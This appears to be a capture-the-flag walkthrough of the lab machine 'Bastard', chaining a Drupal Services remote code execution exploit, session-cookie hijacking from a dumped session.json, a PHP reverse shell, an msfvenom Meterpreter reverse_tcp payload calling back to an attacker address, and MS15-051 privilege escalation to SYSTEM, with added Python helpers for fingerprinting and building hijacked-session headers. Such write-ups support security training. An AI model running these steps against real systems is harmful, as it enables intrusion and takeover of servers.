
Today we're going to solve another CTF machine, "Bastard". It is now a retired box and is accessible only to VIP members.
Introduction
Specifications
- Target OS: Windows
- Services: HTTP, msrpc, unknown
- IP Address: 10.10.10.9
- Difficulty: Medium
Weakness
- Exploit-DB 41564
- MS15-051
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step is reconnaissance, starting with a port scan.
Ports Scanning
During this step we identify what is running behind the IP address.

Enumerate Drupal
Drupal is running on HTTP, and nmap's http-* scripts give us several things worth checking (the generator tag, robots.txt entries, and the risky TRACE method).
80/tcp    open  http   Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc  Microsoft Windows RPC
49154/tcp open  msrpc  Microsoft Windows RPC
Before anything else we need to know exactly which version of Drupal is installed. robots.txt lists /CHANGELOG.txt as disallowed, but that only asks crawlers to skip it; the file is still served, and its first entry names the installed release.
In this case Drupal 7.54 is installed, so let's searchsploit.
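As an added example (not part of the original write-up), here is a small Python helper that does the CHANGELOG.txt check programmatically: it pulls the newest "Drupal X.Y, YYYY-MM-DD" header out of the file, which is the installed release. The sample changelog text is constructed to mirror the real file's layout (the entry bodies are placeholders, not real release notes); the base URL is the one from the write-up, and the function names are this example's own.

```python
"""Identify the installed Drupal 7 release from /CHANGELOG.txt.

Added example, not code from the original write-up. Drupal 7 ships
CHANGELOG.txt in the web root with the newest release first, so the first
"Drupal X.Y, YYYY-MM-DD" line is the installed version.
"""
import re
import urllib.request

# Constructed sample resembling the head of a Drupal 7 CHANGELOG.txt.
# Entry bodies are placeholders; only the header lines matter here.
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- (release notes omitted in this constructed sample)

Drupal 7.53, 2016-12-07
-----------------------
- (release notes omitted in this constructed sample)
"""

# Matches the release header lines; versions may have 2 or 3 components.
VERSION_RE = re.compile(r"^Drupal (\d+\.\d+(?:\.\d+)?), (\d{4}-\d{2}-\d{2})",
                        re.MULTILINE)


def parse_drupal_version(changelog_text):
    """Return (version, release_date) of the newest entry, or None if no header
    is found (e.g. the server returned a 404 page or a themed error instead)."""
    match = VERSION_RE.search(changelog_text)
    if not match:
        return None
    return match.group(1), match.group(2)


def all_versions(changelog_text):
    """Every release header in the file, newest first. A file that only lists
    one release, or none, is a hint that we did not get the real CHANGELOG.txt."""
    return [m.group(1) for m in VERSION_RE.finditer(changelog_text)]


def version_tuple(version):
    """'7.54' -> (7, 54) so releases compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def fetch_changelog(base_url, timeout=10):
    """Fetch /CHANGELOG.txt from a live target (network call; the offline demo
    below uses SAMPLE_CHANGELOG instead). Assumes the file is served as text."""
    req = urllib.request.Request(base_url.rstrip("/") + "/CHANGELOG.txt",
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Offline demo on the constructed sample; swap in
    # fetch_changelog("http://10.10.10.9") against the real box.
    found = parse_drupal_version(SAMPLE_CHANGELOG)
    print("installed release:", found)
    print("all releases listed:", all_versions(SAMPLE_CHANGELOG))
```

The regex anchors on the header line rather than grepping "Drupal" anywhere, because the body of the changelog mentions "Drupal" constantly; parse_drupal_version returning None is the signal that the response was not the real file.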
The exploit we're going to use is "Drupal 7.x Module Services - Remote Code Execution" (Exploit-DB 41564).
We need to modify the exploit before running it. It needs the Services REST endpoint path, which we found during directory enumeration, so we set the endpoint path to /rest:
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
Running the exploit writes two files, user.json and session.json.
There are two ways to get a reverse shell from here.
Reverse Shell Using Drupal
We can use the session.json data the exploit produced to log in as administrator.
session.json
{
  "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
  "session_id": "li1-xoDBXCgxKg0rI9tn3pS6CsfJaQKwEjARmfxlxa0",
  "token": "2dnjgeee6Cy5hRPikPeogGjbxqqgdKeyEo2v32d-jEU"
}
Now open http://10.10.10.9/admin. The browser currently sends only:
Cookie: has_js=1; Drupal.toolbar.collapsed=0
We have to add the session cookie in the format session_name=session_id, i.e. the session_name value is the cookie name and session_id is its value:
Cookie: has_js=1; Drupal.toolbar.collapsed=0; SESSd873f26fc11f2b7e6e4aa0f6fce59913=li1-xoDBXCgxKg0rI9tn3pS6CsfJaQKwEjARmfxlxa0
The token is the Services CSRF token (sent as the X-CSRF-Token header when talking to the /rest endpoint); it is not needed for the browser login.
Once you have access to the administration panel, go to Modules and enable the PHP filter module. That adds the "PHP code" text format, so we can create a node whose body is a PHP reverse shell and execute it by viewing the page.
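As an added example (not part of the original write-up or of the Exploit-DB script), the following Python turns the session.json shown above into the headers needed for the two ways of using it: the Cookie header for the browser login to /admin, and the Cookie plus X-CSRF-Token pair that the Services REST endpoint expects for authenticated calls. The JSON is the one from the write-up; the function names, the validation checks and the optional live /admin probe (which assumes /admin answers 200 when logged in and 403 otherwise) are this example's own.

```python
"""Build HTTP headers from the session.json written by the Services exploit.

Added example, not code from the original write-up. In Drupal 7 the session
cookie is named SESS<hash> (session_name) and its value is session_id; the
token field is the Services module CSRF token, sent as X-CSRF-Token.
"""
import json
import urllib.error
import urllib.request

# The session.json contents from the write-up.
SESSION_JSON = """{
  "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
  "session_id": "li1-xoDBXCgxKg0rI9tn3pS6CsfJaQKwEjARmfxlxa0",
  "token": "2dnjgeee6Cy5hRPikPeogGjbxqqgdKeyEo2v32d-jEU"
}"""


def load_session(text):
    """Parse session.json and sanity-check the three fields we rely on."""
    data = json.loads(text)
    for key in ("session_name", "session_id", "token"):
        if not data.get(key):
            raise ValueError(f"session.json is missing {key!r}")
    # Drupal session cookies are named SESS<hash> (SSESS<hash> over HTTPS).
    if not data["session_name"].startswith(("SESS", "SSESS")):
        raise ValueError("session_name does not look like a Drupal session cookie")
    return data


def cookie_header(session, existing="has_js=1; Drupal.toolbar.collapsed=0"):
    """Cookie header for the browser: keep the existing harmless cookies,
    drop any stale Drupal session cookie, append session_name=session_id."""
    parts = [p.strip() for p in existing.split(";") if p.strip()]
    parts = [p for p in parts
             if not p.split("=", 1)[0].startswith(("SESS", "SSESS"))]
    parts.append(f"{session['session_name']}={session['session_id']}")
    return "; ".join(parts)


def services_headers(session):
    """Headers for authenticated JSON calls to the Services endpoint (/rest):
    the session cookie plus the CSRF token the module requires on writes."""
    return {
        "Cookie": f"{session['session_name']}={session['session_id']}",
        "X-CSRF-Token": session["token"],
        "Content-Type": "application/json",
    }


def admin_accessible(base_url, session, timeout=10):
    """Live check (network call): does /admin load with the stolen session?
    Assumes Drupal returns 200 for an admin and 403 for everyone else."""
    req = urllib.request.Request(base_url.rstrip("/") + "/admin",
                                 headers={"Cookie": cookie_header(session)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        return err.code == 200


if __name__ == "__main__":
    sess = load_session(SESSION_JSON)
    print("browser cookie:", cookie_header(sess))
    print("REST headers:  ", services_headers(sess))
    # Against the real box: admin_accessible("http://10.10.10.9", sess)
```

Stripping any existing SESS* cookie before appending matters in practice: if the browser already holds an anonymous Drupal session cookie, sending two SESS cookies leaves it to the server which one wins.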
You can get user.txt file from C:\Users\dimitris\Desktop directory.
Privilege Escalation
Now that we have user access, the first job is to swap the PHP web shell for a proper reverse shell, and then run Metasploit's local exploit suggester to see which missing patches the box has.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=1338 -f exe > shell.exe
Upload shell.exe through the PHP shell, start a matching multi/handler on 10.10.14.11:1338, and run it.
That gives us a proper Meterpreter session.
Running post/multi/recon/local_exploit_suggester against that session returned a few candidate exploits. I tested them and one of them worked:
use exploit/windows/local/ms15_051_client_copy_image
And we are NT AUTHORITY\SYSTEM.
We can obtain root.txt from here: C:\Users\Administrator\Desktop\root.txt